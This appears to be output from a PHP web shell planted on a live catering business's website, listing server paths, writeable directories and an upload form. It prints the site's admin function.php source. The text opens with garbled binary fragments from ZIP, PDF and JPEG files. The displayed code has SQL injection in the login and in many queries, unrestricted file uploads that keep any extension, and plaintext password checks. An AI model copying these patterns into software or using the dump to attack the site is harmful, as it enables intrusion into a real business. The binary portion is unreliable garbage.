œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzÂœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :
ikan Uploader :
Directory :  /home/ni05r7l36tus/public_html/sumangalamcaterers.com/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /home/ni05r7l36tus/public_html/sumangalamcaterers.com/admin/function.php
<?php
include"connection/config.php"; 

if(isset($_REQUEST['login'])){


    $username = $_POST['username'];
    $password = $_POST['password'];


    // Query the database
    $sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";
    $result = $mysqli->query($sql);

    if ($result->num_rows > 0) {
        session_start();
        $_SESSION['loggedin'] = true;
        $_SESSION['username'] = $username;
        header("Location: index.php");
    } else {
       header("Location: login.php");
    }

}

///----Add slider image -----// 
if(isset($_REQUEST['add_slider'])){
	
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	 
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name']; 
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insert=$mysqli->query("INSERT INTO `slider` (`title`, `image`) VALUES ('$title', '$image_name')");
	if($insert)
	{
		
		header('location:slider.php');
	} 
}

if(isset($_REQUEST['update_slider'])){
	$id=$_REQUEST['id'];
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$update=$mysqli->query("UPDATE `slider` SET `title`='$title', `image`='$image_name' WHERE `id`='$id'");
	if($update)
	{
		
		header('location:slider.php');
	}
}

///----delete image of slider-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_slider')
{
$id=$_GET['id'];
$sql4=$mysqli->query("select * from `slider` where `id`='$id'");
$row = mysqli_fetch_array($sql4);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_slider =$mysqli->query("delete from `slider` where `id`='$id'");
if ($sql_slider==true) {
	header("location:slider.php");  
}

}



//--------add testimonial---------//
if(isset($_REQUEST['add_testimonial']))
{
if(isset($_REQUEST['cname']))
{
 $cname=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['cname']));
} 
if(isset($_REQUEST['testimonial']))
{
$testimonial=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['testimonial']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	
$layout_update=$mysqli->query("INSERT INTO `testimonial` (`image` ,`cname`,`testimonial`) VALUES ('$image_name','$cname','$testimonial')");

	if($layout_update)	
	{
		
			header("location:testimonial.php");
	}
}


///-------------update testimonial-----------//
if(isset($_REQUEST['update_testimonial']))
{
$id=$_REQUEST['id']; 
if(isset($_REQUEST['cname']))
{
$cname=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['cname']));
}
if(isset($_REQUEST['testimonial']))
{
$testimonial=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['testimonial']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
$layout_update=$mysqli->query("UPDATE `testimonial` SET `image`='$image_name',`cname`='$cname',`testimonial`='$testimonial' WHERE `id`='$id'");

    if($layout_update)  
    {
        
        header("location:testimonial.php");
    }
}	 
///----delete testimonail-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_testimonial')
{
$id=$_GET['id'];
$sql_testimonial =$mysqli->query("delete from `testimonial` where `id`='$id'");
if ($sql_testimonial==true) {
	header("location:testimonial.php");  
}

}



////-----------add blog-----//////
if(isset($_REQUEST['add_blog']))
{
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['adddate']))
{
$adddate=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['adddate']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}

if(isset($_REQUEST['description']))
{

 $description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

$date=date('d-m-Y');
// echo"INSERT INTO `blog` (`title`, `pagetitle`, `slug`,`keyword`,`seodescription`, `image`,`description`,`adddate`,`date`) VALUES ('$title','$pagetitle', `$slug`,'$keyword','$seodescription','$image_name','$description','$adddate','$date')";
// die();

$layout_blog=$mysqli->query("INSERT INTO `blog` (`title`, `pagetitle`, `slug`,`keyword`,`seodescription`, `image`,`description`,`adddate`,`date`) VALUES ('$title','$pagetitle', '$slug','$keyword','$seodescription','$image_name','$description','$adddate','$date')");

if ($layout_blog) {
	header("location:blog.php");
}else{
	header("location:add_blog.php");
}

            
	
}

//------Update Blogs------///
if(isset($_REQUEST['update_blog']))
{
$id=$_REQUEST['id'];
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['adddate']))
{
$adddate=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['adddate']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}

if(isset($_REQUEST['description']))
{

$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

$layout_update1=$mysqli->query("UPDATE `blog` SET `title`='$title',`pagetitle`='$pagetitle',`slug`='$slug',`keyword`='$keyword',`seodescription`='$seodescription', `image`='$image_name',`description`='$description',`adddate`='$adddate' WHERE `id`='$id'");
	if($layout_update1)	
	{            
		
	header("location:blog.php");
		       
	}
	else{
		echo "Blog Has not Update";
	}
}
///----delete blog-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_blog')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `blog` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_blog =$mysqli->query("delete from `blog` where `id`='$id'");


if ($sql_blog == true)
 {
	     header("location:blog.php");  
     }
 

}
//-----END BLOG SECTION -----//


 

//--------add cars---------------//
if(isset($_REQUEST['add_service']))
{	
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}	
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
$seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['pagedetails_title']))
{
$pagedetails_title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagedetails_title']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
// echo"INSERT INTO `service`(`title`,`slug`, `pagetitle`,`keyword`,`seodescription`,`image`, `description`) VALUES ($title','$slug','$pagetitle','$keyword','$seodescription','$image_name','$description')";
// die();
$addresort=$mysqli->query("INSERT INTO `service`(`title`,`slug`, `pagetitle`,`keyword`,`seodescription`,`image`, `description`,`pagedetails_title`) VALUES ('$title','$slug','$pagetitle','$keyword','$seodescription','$image_name','$description','$pagedetails_title')");
	if($addresort)	
	{            
		           $last_id = $mysqli->insert_id;
					if (isset($_POST['features'])) {
					    $features = $_POST['features'];

					    foreach ($features as $feature) {
					        $cleaned_feature = mysqli_real_escape_string($mysqli, htmlentities($feature));

					        // Only insert if not empty
					        if (!empty($cleaned_feature)) {
					            $mysqli->query("INSERT INTO `service_feature`(`service_id`, `feature`) VALUES ('$last_id', '$cleaned_feature')");
					        }
					    }
					}
								

		       

	header("location:servicefaq.php?service_id=$last_id");
		       
	}
	else{
		echo "Blog Has not Update";
	}

}


//------Update Blogs------///
if(isset($_REQUEST['update_service']))
{
$id=$_REQUEST['id'];
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}	
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
$seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['pagedetails_title']))
{
$pagedetails_title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagedetails_title']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
$layout_update1=$mysqli->query("UPDATE `service` SET `title`='$title', `slug`='$slug', `pagetitle`='$pagetitle',`keyword`='$keyword',`seodescription`='$seodescription',`image`='$image_name', `description`='$description',`pagedetails_title`='$pagedetails_title' WHERE `id`='$id'");
if($layout_update1)	
	{            
          $last_id = $id;
        // Insert and print new features
		    if (isset($_POST['feature']) && is_array($_POST['feature'])) {
		        $features = $_POST['feature'];
		      
		        foreach ($features as $feature) {
		            $cleaned_feature = mysqli_real_escape_string($mysqli, htmlentities($feature));
		            if (!empty($cleaned_feature)) {
		                $mysqli->query("
		                    INSERT INTO `service_feature` (`service_id`, `feature`) 
		                    VALUES ('$last_id', '$cleaned_feature')
		                ");

		                
		            }
		        }  
            }

            header("location:service.php");      
       }
		 
	}
	else{
		echo "Blog Has not Update";
	}




//---------delete multiple image--------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='multiimg')
{

$id=$_GET['id'];
$sql1=$mysqli->query("select * from `resort_images` where `id`='$id'");
$row = mysqli_fetch_array($sql1);
$img_name = $row['images'];
unlink("../upload/$img_name");
$sql =$mysqli->query("delete from `resort_images` where `id`='$id'");
if($sql)    
    {
        echo "npsucess";
    }
    else
    {
       echo "fail"; 
    }   
}



//-------delete features -----------//
if(isset($_REQUEST['remove_feature']))
{

$feature_id=$_REQUEST['feature_id'];
$service_id=$_REQUEST['service_id'];

$sql =$mysqli->query("delete from `service_feature` where `id`='$feature_id'");
if($sql)    
    {
       header("location:add_service.php?id=$service_id&action=edit_service");
    }
    else
    {
       echo "fail"; 
    }   
}




//-----------delete car details --------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_service')
{

$id=$_GET['id'];
$sql1=$mysqli->query("select * from `service_feature` where `service_id`='$id'");
$row1 = mysqli_fetch_array($sql1);
$img_name2 = $row1['id'];
$sql10 =$mysqli->query("delete from `service_feature` where `id`='$img_name2'");

$sql_car=$mysqli->query("select * from `service` where `id`='$id'");
$row2 = mysqli_fetch_array($sql_car);
$img_name1 = $row2['image'];
unlink("../upload/$img_name1");
$sql_cars =$mysqli->query("delete from `service` where `id`='$id'");

if ($sql_cars == true)
 {

	     header("location:service.php");  

  }

   
}



//--------add service FAQ---------//
if(isset($_REQUEST['add_servicefaq']))
{
if(isset($_REQUEST['service_id']))
{
 $service_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['service_id']));
}	
if(isset($_REQUEST['question']))
{
 $question=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['question']));
} 
if(isset($_REQUEST['answer']))
{
$answer=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['answer']));
}

	
$layout_update=$mysqli->query("INSERT INTO `servicefaq` (`service_id` ,`question`,`answer`) VALUES ('$service_id','$question','$answer')");

	if($layout_update)	
	{
		
			header("location:servicefaq.php?service_id=$service_id");
	}
}

if(isset($_REQUEST['update_servicefaq']))
{

$id=$_REQUEST['id']; 
if(isset($_REQUEST['service_id']))
{
 $service_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['service_id']));
}   
if(isset($_REQUEST['question']))
{
 $question=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['question']));
} 
if(isset($_REQUEST['answer']))
{
$answer=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['answer']));
}

// echo "UPDATE `servicefaq` SET `service_id`='$service_id',`question`='$question',`answer`='$answer' WHERE `id`='$id'";
// die();

$layout_update=$mysqli->query("UPDATE `servicefaq` SET `service_id`='$service_id',`question`='$question',`answer`='$answer' WHERE `id`='$id'");

    if($layout_update)  
    {
        //echo $service_id;
        header("location:servicefaq.php?service_id=$service_id");
    }
}
	 
///----delete testimonail-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_servicefaq')
{
$id=$_GET['id'];
if(isset($_REQUEST['service_id']))
{
 $service_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['service_id']));
}
$sql_testimonial =$mysqli->query("delete from `servicefaq` where `id`='$id'");
if ($sql_testimonial==true) {
	header("location:servicefaq.php?service_id=$service_id");  
}

}


if(isset($_REQUEST['delete_faq']))
{

 $id=$_REQUEST['feature_id'];

if(isset($_REQUEST['service_id']))
{
 $service_id=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['service_id']));
}

$sql_faq =$mysqli->query("delete from `servicefaq` where `id`='$id'");
if ($sql_faq==true) {

	header("location:add_service.php?id=$service_id&action=edit_service");  
}

}

	
//--------end cars---------------//



///-------------delete booking---------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_booking')
{
$id=$_GET['id'];
$sql_delete_booking =$mysqli->query("delete from `carbooking` where `id`='$id'");
if ($sql_delete_booking==true) {
	header("location:booking.php");  
}

}


//--------add contact---------//
if(isset($_REQUEST['add_contact']))
{
if(isset($_REQUEST['name']))
{
 $name=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['name']));
} 

if(isset($_REQUEST['email']))
{
 $email=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['email']));
} 
if(isset($_REQUEST['subject']))
{
 $subject=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['subject']));
} 
if(isset($_REQUEST['number']))
{
$number=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['number']));
}
if(isset($_REQUEST['message']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['message']));
}

	
$insert=$mysqli->query("INSERT INTO `contact` (`name` ,`email`,`number`,`subject`,`message`) VALUES ('$name','$email','$number','$subject','$description')");

	if($insert)	
	{
		
		header("Location: https://www.sumangalamcaterers.com/contact.php");
exit();

	}
}


///-------------delete Contact---------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_contact')
{
$id=$_GET['id'];
$sql_contact =$mysqli->query("delete from `contact` where `id`='$id'");
if ($sql_contact==true) {
	header("location:contact.php");  
}

}


///----update about-----/// 
if (isset($_REQUEST['update_about'])) {
    $id = $_REQUEST['id'] ?? null;
    $title = $_REQUEST['title'];
	$video = $_REQUEST['video'];
    $description = $_REQUEST['description'];
    $slug = $_REQUEST['slug'];
    $keyword = $_REQUEST['keyword'];
    $metadescription = $_REQUEST['seodescription'];
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}

    if ($id) {
        $query = "UPDATE about SET 
                  title='$title', description='$description', slug='$slug', 
                  keyword='$keyword', metadescription='$metadescription',image='$image_name',video_link='$video'
                  WHERE id=$id";

        if ($mysqli->query($query)) {
            header('Location: about.php'); // Redirect back to the form page
        } else {
            echo "Error: " . $mysqli->error;
        }
    } else {
        echo "Error: Invalid ID provided for update.";
    }
}


	//login //
	if (isset($_REQUEST['login'])) {
		$username = mysqli_real_escape_string($mysqli, $_POST['username']);
		$password = mysqli_real_escape_string($mysqli, $_POST['password']);
		
		// Query the database
		$sql = "SELECT * FROM login WHERE username='$username' AND password='$password'";
		$result = $mysqli->query($sql);
	
		if ($result->num_rows > 0) {
			session_start();
			$_SESSION['loggedin'] = true;
			$_SESSION['username'] = $username;
			header("Location: index.php");
		} else {
			header("Location: login.php");
		}
	}

///----Add Gallery image -----// 
if(isset($_REQUEST['add_gallery'])){
	
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insertgallery=$mysqli->query("INSERT INTO `gallery` (`title`, `image`) VALUES ('$title', '$image_name')");
	if($insertgallery)
	{
		
		header('location:gallery.php');
	} 
}

if(isset($_REQUEST['update_gallery'])){
	$id=$_REQUEST['id'];
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$updategallery=$mysqli->query("UPDATE `gallery` SET `title`='$title', `image`='$image_name' WHERE `id`='$id'");
	if($updategallery)
	{
		
		header('location:gallery.php');
	}
}

///----delete image of gallery-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_gallery')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `gallery` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_gallery =$mysqli->query("delete from `gallery` where `id`='$id'");
if ($sql_gallery==true) {
	header("location:gallery.php");  
}

}






//--------add Offer---------//
if(isset($_REQUEST['add_offer']))
{
if(isset($_REQUEST['offertitle']))
{
 $offertitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['offertitle']));
} 
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
